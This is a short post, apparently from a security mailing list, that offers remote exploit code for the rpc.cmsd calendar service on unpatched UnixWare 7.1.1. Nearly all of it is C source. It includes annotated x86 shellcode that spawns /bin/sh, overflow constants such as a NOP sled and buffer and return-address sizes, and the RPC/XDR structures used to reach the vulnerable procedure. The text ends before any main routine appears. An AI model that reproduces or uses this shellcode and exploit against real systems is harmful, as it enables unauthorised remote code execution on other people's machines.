Unixware 7.1.1 rpc.cmsd remote exploit code.

[jGgM. <jggm () mail com>]

Hi, I'm jGgM.

Here is unixware 7.1.1 rpc.cmsd remote exploit code.
This is old bug. ( Currently patched....maybe.. )
This works only not -patched Unixware 7.1.1.

--------------------------------------
Korean security Info.. by jGgM.
http://www.forsecure.com/
http://www.netemperor.com/
--------------------------------------
/*
 * Unixware 7.x rpc.cmsd exploit by jGgM
 * http://www.netemperor.com/en/
 * EMail: jggm () mail com
 */

#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <rpc/rpc.h>

#define CMSD_PROG 100068
#define CMSD_VERS 4
#define CMSD_PROC 21

#define BUFFER_SIZE     1036
#define SHELL_START     1024
#define RET_LENGTH      12
#define ADJUST          100
#define NOP     0x90
#define LEN             68

char shell[] =
  /*  0 */ "\xeb\x3d"                         /* jmp springboard 
[2000]*/
  /* syscall:                                                    [2000]*/
  /*  2 */ "\x9a\xff\xff\xff\xff\x07\xff"     /* lcall 0x7,0x0   
[2000]*/
  /*  9 */ "\xc3"                             /* ret             [2000]*/
  /* start:                                                      [2000]*/
  /* 10 */ "\x5e"                             /* popl %esi       
[2000]*/
  /* 11 */ "\x31\xc0"                         /* xor %eax,%eax   
[2000]*/
  /* 13 */ "\x89\x46\xbf"                     /* movl %eax,-
0x41(%esi) */
  /* 16 */ "\x88\x46\xc4"                     /* movb %al,-0x3c
(%esi)  */
  /* 19 */ "\x89\x46\x0c"                     /* movl %eax,0xc
(%esi)   */
  /* 22 */ "\x88\x46\x17"                     /* movb %al,0x17
(%esi)   */
  /* 25 */ "\x88\x46\x1a"                     /* movb %al,0x1a
(%esi)   */
  /* 28 */ "\x88\x46\xff"                     /* movb %al,0x??
(%esi)   */
  /* execve:                                                     [2000]*/
  /* 31 */ "\x31\xc0"                         /* xor %eax,%eax   
[2000]*/
  /* 33 */ "\x50"                             /* pushl %eax      
[2000]*/
  /* 34 */ "\x56"                             /* pushl %esi      
[2000]*/
  /* 35 */ "\x8d\x5e\x10"                     /* leal 0x10(%
esi),%ebx  */
  /* 38 */ "\x89\x1e"                         /* movl %ebx,(%
esi)[2000]*/
  /* 40 */ "\x53"                             /* pushl %ebx      
[2000]*/
  /* 41 */ "\x8d\x5e\x18"                     /* leal 0x18(%
esi),%ebx  */
  /* 44 */ "\x89\x5e\x04"                     /* movl %ebx,0x4
(%esi)   */
  /* 47 */ "\x8d\x5e\x1b"                     /* leal 0x1b(%
esi),%ebx  */
  /* 50 */ "\x89\x5e\x08"                     /* movl %ebx,0x8
(%esi)   */
  /* 53 */ "\xb0\x3b"                         /* movb $0x3b,%al  
[2000]*/
  /* 55 */ "\xe8\xc6\xff\xff\xff"             /* call syscall    
[2000]*/
  /* 60 */ "\x83\xc4\x0c"                     /* addl $0xc,%
esp  [2000]*/
  /* springboard:                                                [2000]*/
  /* 63 */ "\xe8\xc6\xff\xff\xff"             /* call start      
[2000]*/
  /* data:                                                       [2000]*/
  /* 68 */ "\xff\xff\xff\xff"                 /* DATA            [2000]
*/
  /* 72 */ "\xff\xff\xff\xff"                 /* DATA            [2000]
*/
  /* 76 */ "\xff\xff\xff\xff"                 /* DATA            [2000]
*/
  /* 80 */ "\xff\xff\xff\xff"                 /* DATA            [2000]
*/
  /* 84 */ "\x2f\x62\x69\x6e\x2f\x73\x68\xff" /* 
DATA            [2000]*/
  /* 92 */ "\x2d\x63\xff";                    /* DATA            
[2000]*/

struct cm_send {
   char *s1;
   char *s2;
};

struct cm_reply {
   int i;
};

bool_t xdr_cm_send(XDR *xdrs, struct cm_send 
*objp)
{
   if(!xdr_wrapstring(xdrs, &objp->s1))
      return (FALSE);
   if(!xdr_wrapstring(xdrs, &objp->s2))
       return (FALSE);
   return (TRUE);
}

bool_t xdr_cm_reply(XDR *xdrs, struct cm_reply 
*objp)
{
   if(!xdr_int(xdrs, &objp->i))
      return (FALSE);
   return (TRUE);
}